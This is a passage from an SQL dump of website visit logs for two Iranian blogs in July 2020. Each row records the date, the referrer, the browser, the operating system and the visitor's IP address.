(3535,'2020-07-11','http://design-arena.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','94.158.36.183','000',0,2,0),
(3536,'2020-07-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.164.88.133','000',0,1,0),
(3537,'2020-07-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','164.68.99.12','000',0,1,0),
(3538,'2020-07-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3539,'2020-07-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.191.170','000',0,1,0),
(3540,'2020-07-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(3541,'2020-07-11','https://www.google.com','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.91.129.4','000',0,1,0),
(3542,'2020-07-12','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.162','000',0,1,0),
(3543,'2020-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.148.59','000',0,1,0),
(3544,'2020-07-12','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,1,0),
(3545,'2020-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.175.38','000',0,1,0),
(3546,'2020-07-12','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','195.2.73.43','000',0,3,0),
(3547,'2020-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','114.202.2.198','000',0,2,0),
(3548,'2020-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.10.239.248','000',0,1,0),
(3549,'2020-07-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3550,'2020-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.196.112','000',0,1,0),
(3551,'2020-07-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,4,0),
(3552,'2020-07-12','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','121.89.209.72','000',0,3,0),
(3553,'2020-07-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(3554,'2020-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','88.80.36.119','000',0,1,0),
(3555,'2020-07-13','http://82.102.9.14/blog','Firefox','Windows','6.1',NULL,NULL,'','35.193.230.57','000',0,3,0),
(3556,'2020-07-13','http://www.bing.com/search?q=amazon','Chrome','Windows','10.0',NULL,NULL,'','65.154.226.109','000',0,1,0),
(3557,'2020-07-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.100','000',0,1,0),
(3558,'2020-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.114.10','000',0,1,0),
(3559,'2020-07-13','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,1,0),
(3560,'2020-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.0.149','000',0,1,0),
(3561,'2020-07-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3562,'2020-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.50.138','000',0,1,0),
(3563,'2020-07-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.146','000',0,2,0),
(3564,'2020-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.160.30.210','000',0,2,0),
(3565,'2020-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.184.102','000',0,1,0),
(3566,'2020-07-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.100.87.250','000',0,1,0),
(3567,'2020-07-13','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(3568,'2020-07-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(3569,'2020-07-13','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','136.27.62.24','000',0,1,0),
(3570,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.37.179','000',0,1,0),
(3571,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.80.249.243','000',0,2,0),
(3572,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','89.248.167.131','000',0,1,0),
(3573,'2020-07-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.250','000',0,1,0),
(3574,'2020-07-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(3575,'2020-07-14','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(3576,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.41.60.51','000',0,1,0),
(3577,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.214.210.114','000',0,1,0),
(3578,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','27.72.57.151','000',0,1,0),
(3579,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.43.12.145','000',0,1,0),
(3580,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.182.5.30','000',0,1,0),
(3581,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.199.72.32','000',0,1,0),
(3582,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.113.110.128','000',0,1,0),
(3583,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.74.138.9','000',0,1,0),
(3584,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.91.70.51','000',0,1,0),
(3585,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.142','000',0,1,0),
(3586,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.210.172.247','000',0,1,0),
(3587,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.30','000',0,1,0),
(3588,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.171.163.19','000',0,1,0),
(3589,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','175.29.232.2','000',0,1,0),
(3590,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,1,0),
(3591,'2020-07-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3592,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.24','000',0,2,0),
(3593,'2020-07-14','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','45.90.58.33','000',0,1,0),
(3594,'2020-07-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(3595,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.9.156','000',0,1,0),
(3596,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','109.95.158.82','000',0,1,0),
(3597,'2020-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.120.63','000',0,1,0),
(3598,'2020-07-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(3599,'2020-07-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.226','000',0,1,0),
(3600,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.79.123.136','000',0,2,0),
(3601,'2020-07-15','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','193.111.187.87','000',0,1,0),
(3602,'2020-07-15','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','178.33.34.7','000',0,1,0),
(3603,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.49.165','000',0,1,0),
(3604,'2020-07-15','http://www.ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.91.129.4','000',0,5,0),
(3605,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.9','000',0,1,0),
(3606,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.4','000',0,1,0),
(3607,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.170.196.53','000',0,1,0),
(3608,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.214.111.162','000',0,1,0),
(3609,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.42.56.13','000',0,1,0),
(3610,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.29','000',0,1,0),
(3611,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.10','000',0,1,0),
(3612,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','74.208.57.129','000',0,1,0),
(3613,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.89.225.141','000',0,1,0),
(3614,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.57.226.29','000',0,1,0),
(3615,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.57.226.33','000',0,1,0),
(3616,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.214','000',0,1,0),
(3617,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.161','000',0,1,0),
(3618,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,1,0),
(3619,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.169','000',0,1,0),
(3620,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','199.192.18.186','000',0,1,0),
(3621,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.40.248.107','000',0,1,0),
(3622,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.213.82.137','000',0,1,0),
(3623,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.15','000',0,2,0),
(3624,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.32','000',0,1,0),
(3625,'2020-07-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','206.222.28.10','000',0,1,0),
(3626,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.169.30','000',0,1,0),
(3627,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.67','000',0,1,0),
(3628,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','115.68.182.136','000',0,1,0),
(3629,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','207.246.240.120','000',0,1,0),
(3630,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.244.52.99','000',0,1,0),
(3631,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.189.7.27','000',0,1,0),
(3632,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.136','000',0,1,0),
(3633,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.214','000',0,1,0),
(3634,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.24','000',0,1,0),
(3635,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.14','000',0,1,0),
(3636,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.31','000',0,1,0),
(3637,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.120.68','000',0,1,0),
(3638,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.120.47','000',0,1,0),
(3639,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.28','000',0,1,0),
(3640,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.23.195.200','000',0,1,0),
(3641,'2020-07-15','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.229.180.198','000',0,2,0),
(3642,'2020-07-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','115.84.99.216','000',0,1,0),
(3643,'2020-07-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3644,'2020-07-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(3645,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.163.197.118','000',0,1,0),
(3646,'2020-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.135.59','000',0,1,0),
(3647,'2020-07-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(3648,'2020-07-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(3649,'2020-07-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.83.78','000',0,1,0),
(3650,'2020-07-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','217.218.21.242','000',0,1,0),
(3651,'2020-07-16','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','95.216.203.90','000',0,1,0),
(3652,'2020-07-16','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','135.181.26.132','000',0,1,0),
(3653,'2020-07-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.159.31.159','000',0,1,0),
(3654,'2020-07-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.4.57.115','000',0,7,0),
(3655,'2020-07-16','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.12.194.165','000',0,2,0),
(3656,'2020-07-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(3657,'2020-07-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.151.231','000',0,1,0),
(3658,'2020-07-16','http://ictbank.ir/blog','Yandex Browser','Windows','6.2',NULL,NULL,'','95.221.54.125','000',0,1,0),
(3659,'2020-07-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','134.209.153.221','000',0,1,0),
(3660,'2020-07-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(3661,'2020-07-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3662,'2020-07-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.157.219','000',0,1,0),
(3663,'2020-07-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','217.218.21.242','000',0,6,0),
(3664,'2020-07-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.242.50','000',0,1,0),
(3665,'2020-07-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(3666,'2020-07-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(3667,'2020-07-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.243.56.121','000',0,1,0),
(3668,'2020-07-17','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,7,0),
(3669,'2020-07-17','http://82.102.9.14/blog','Firefox','Windows','6.1',NULL,NULL,'','3.125.160.225','000',0,1,0),
(3670,'2020-07-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','45.32.251.78','000',0,1,0),
(3671,'2020-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','31.186.81.139','000',0,2,0),
(3672,'2020-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.130.176','000',0,1,0),
(3673,'2020-07-17','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','176.31.244.49','000',0,1,0),
(3674,'2020-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.33.221.252','000',0,1,0),
(3675,'2020-07-17','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(3676,'2020-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.27.169','000',0,2,0),
(3677,'2020-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.69.145','000',0,1,0),
(3678,'2020-07-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(3679,'2020-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.159.9.161','000',0,1,0),
(3680,'2020-07-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(3681,'2020-07-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.162','000',0,1,0),
(3682,'2020-07-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(3683,'2020-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.121.3','000',0,2,0),
(3684,'2020-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.130','000',0,2,0),
(3685,'2020-07-17','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','159.203.40.244','000',0,1,0),
(3686,'2020-07-17','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','34.72.85.73','000',0,1,0),
(3687,'2020-07-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','101.21.145.129','000',0,1,0),
(3688,'2020-07-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','3.112.34.64','000',0,1,0),
(3689,'2020-07-18','http://design-arena.ir/blog','Chrome','Android','5.1.1',NULL,NULL,'','34.72.85.73','000',0,2,0),
(3690,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.67.179.26','000',0,1,0),
(3691,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','177.70.106.26','000',0,1,0),
(3692,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.31','000',0,1,0),
(3693,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','206.189.24.222','000',0,1,0),
(3694,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','43.241.57.18','000',0,1,0),
(3695,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','72.34.61.254','000',0,1,0),
(3696,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.118','000',0,1,0),
(3697,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.16','000',0,1,0),
(3698,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','108.174.149.35','000',0,1,0),
(3699,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.248.70.54','000',0,1,0),
(3700,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','109.168.103.116','000',0,1,0),
(3701,'2020-07-18','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.229.131.238','000',0,2,0),
(3702,'2020-07-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3703,'2020-07-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.183.149.230','000',0,1,0),
(3704,'2020-07-18','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,2,0),
(3705,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.212.197','000',0,1,0),
(3706,'2020-07-18','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','104.129.18.219','000',0,2,0),
(3707,'2020-07-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','74.116.120.106','000',0,1,0),
(3708,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','144.168.162.250','000',0,1,0),
(3709,'2020-07-18','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','51.38.115.166','000',0,1,0),
(3710,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(3711,'2020-07-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(3712,'2020-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.197.97','000',0,1,0),
(3713,'2020-07-18','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','40.117.234.33','000',0,10,0),
(3714,'2020-07-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(3715,'2020-07-18','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.13.6.233','000',0,3,0),
(3716,'2020-07-18','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','23.96.108.166','000',0,2,0),
(3717,'2020-07-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(3718,'2020-07-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.159.246','000',0,1,0),
(3719,'2020-07-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','54.37.73.136','000',0,2,0),
(3720,'2020-07-19','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','83.150.222.141','000',0,1,0),
(3721,'2020-07-19','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,1,0),
(3722,'2020-07-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.68.51.226','000',0,2,0),
(3723,'2020-07-19','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','23.96.108.166','000',0,2,0),
(3724,'2020-07-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3725,'2020-07-19','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','81.68.131.206','000',0,2,0),
(3726,'2020-07-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.107.20','000',0,1,0),
(3727,'2020-07-19','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','45.82.49.88','000',0,1,0),
(3728,'2020-07-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.21.143.237','000',0,2,0),
(3729,'2020-07-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(3730,'2020-07-19','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','46.101.9.216','000',0,1,0),
(3731,'2020-07-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.253.42.54','000',0,1,0),
(3732,'2020-07-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.231','000',0,1,0),
(3733,'2020-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.249.156','000',0,1,0),
(3734,'2020-07-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(3735,'2020-07-20','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,1,0),
(3736,'2020-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.243.23','000',0,1,0),
(3737,'2020-07-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(3738,'2020-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.166.162','000',0,2,0),
(3739,'2020-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','106.250.189.74','000',0,1,0),
(3740,'2020-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.162.73.174','000',0,1,0),
(3741,'2020-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.191.78','000',0,1,0),
(3742,'2020-07-20','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','211.149.222.66','000',0,2,0),
(3743,'2020-07-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(3744,'2020-07-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.71','000',0,1,0),
(3745,'2020-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.146.164','000',0,2,0),
(3746,'2020-07-21','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(3747,'2020-07-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.18.13','000',0,1,0),
(3748,'2020-07-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','101.21.145.129','000',0,1,0),
(3749,'2020-07-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.34.225','000',0,1,0),
(3750,'2020-07-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.218.253.44','000',0,1,0),
(3751,'2020-07-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3752,'2020-07-21','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','192.144.176.158','000',0,2,0),
(3753,'2020-07-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','37.49.230.128','000',0,1,0),
(3754,'2020-07-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.66.250','000',0,1,0),
(3755,'2020-07-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.126.16','000',0,1,0),
(3756,'2020-07-21','http://ictbank.ir/blog','Unknown','Windows','6.1',NULL,NULL,'','46.166.142.221','000',0,1,0),
(3757,'2020-07-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.224.203','000',0,1,0),
(3758,'2020-07-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.57.65.231','000',0,1,0),
(3759,'2020-07-21','http://ictbank.ir/blog','Opera Mobile','Windows','6.1',NULL,NULL,'','85.248.227.164','000',0,1,0),
(3760,'2020-07-21','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','192.99.5.123','000',0,2,0),
(3761,'2020-07-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','37.49.224.125','000',0,1,0),
(3762,'2020-07-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(3763,'2020-07-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,1,0),
